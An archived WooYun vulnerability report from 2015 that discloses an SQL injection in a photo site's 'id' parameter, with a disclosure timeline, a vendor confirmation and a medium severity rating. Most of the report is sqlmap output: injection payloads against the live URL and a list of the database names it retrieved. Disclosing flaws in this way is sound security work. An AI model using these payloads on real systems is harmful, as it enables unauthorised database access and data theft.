乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-11: 细节已通知厂商并且等待厂商处理中 2015-05-11: 厂商已经确认,细节仅向厂商公开 2015-05-21: 细节向核心白帽子及相关领域专家公开 2015-05-31: 细节向普通白帽子公开 2015-06-10: 细节向实习白帽子公开 2015-06-25: 细节向公众公开
SQL
注入:http://photo.hsw.cn/work/detail?id=8498
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 68 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=8498) AND 9407=9407 AND (1508=1508 Type: UNION query Title: MySQL UNION query (NULL) - 19 columns Payload: id=-3171) UNION ALL SELECT CONCAT(0x716d737371,0x4b447953677662435944,0x71717a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N---[12:55:06] [INFO] testing MySQL[12:55:06] [INFO] confirming MySQL[12:55:08] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.0.0[12:55:08] [INFO] fetching database names[12:55:09] [INFO] the SQL query used returns 14 entries[12:55:09] [INFO] retrieved: "information_schema"[12:55:10] [INFO] retrieved: "ftpusers"[12:55:29] [INFO] retrieved: "hsbug"[12:55:30] [INFO] retrieved: "hscenter"[12:55:31] [INFO] retrieved: "hsfoto"[12:55:33] [INFO] retrieved: "hsmaijia"[12:55:34] [INFO] retrieved: "hstalk"[12:55:34] [INFO] retrieved: "hsteam"[12:55:35] [INFO] retrieved: "hsweixin"[12:55:36] [INFO] retrieved: "mysql"[12:55:36] [INFO] retrieved: "performance_schema"[12:55:37] [INFO] retrieved: "test_fx"[12:55:38] [INFO] retrieved: "test_talk"[12:55:38] [INFO] retrieved: "wiki"available databases [14]:[*] ftpusers[*] hsbug[*] hscenter[*] hsfoto[*] hsmaijia[*] hstalk[*] hsteam[*] hsweixin[*] information_schema[*] mysql[*] performance_schema[*] test_fx[*] test_talk[*] wiki
过滤
危害等级:中
漏洞Rank:5
确认时间:2015-05-11 14:59
作者可以联系下我吗
暂无